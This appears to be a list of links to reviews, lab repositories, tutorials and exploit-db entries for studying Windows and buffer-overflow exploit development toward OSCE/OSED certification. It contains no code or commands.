• https://jhalon.github.io/OSCE-Review/
• https://www.youtube.com/watch?v=NAe6f1_XG6Q
• https://spaceraccoon.dev/rop-and-roll-exp-301-offensive-security-exploit-
development-osed-review-and
• https://blog.kuhi.to/offsec-exp301-osed-review
• https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-
development-review/
• https://spaceraccoon.dev/rop-and-roll-exp-301-offensive-security-exploit-
development-osed-review-and/
Labs
• https://github.com/CyberSecurityUP/Buffer-Overflow-Labs
• https://github.com/ihack4falafel/OSCE
• https://github.com/nathunandwani/ctp-osce
• https://github.com/firmianay/Life-long-Learner/blob/master/SEED-labs/buffer-
overflow-vulnerability-lab.md
• https://github.com/wadejason/Buffer-Overflow-Vulnerability-Lab
• https://github.com/Jeffery-Liu/Buffer-Overflow-Vulnerability-Lab
• https://github.com/mutianxu/SEED-LAB-Bufferoverflow_attack
• https://my.ine.com/CyberSecurity/courses/54819bbb/windows-exploit-development
• https://connormcgarr.github.io/browser1/
• https://www.coalfire.com/the-coalfire-blog/january-2020/the-basics-of-exploit-
development-1
• https://pentestmag.com/product/exploit-development-windows-w38/
• https://steflan-security.com/complete-guide-to-stack-buffer-overflow-
oscp/#:~:text=Stack%20buffer%20overflow%20is%20a,of%20the%20intended%20data
%20structure.
• https://www.offensive-security.com/vulndev/evocam-remote-buffer-overflow-on-osx/
• https://www.exploit-db.com/exploits/42928
• https://www.exploit-db.com/exploits/10434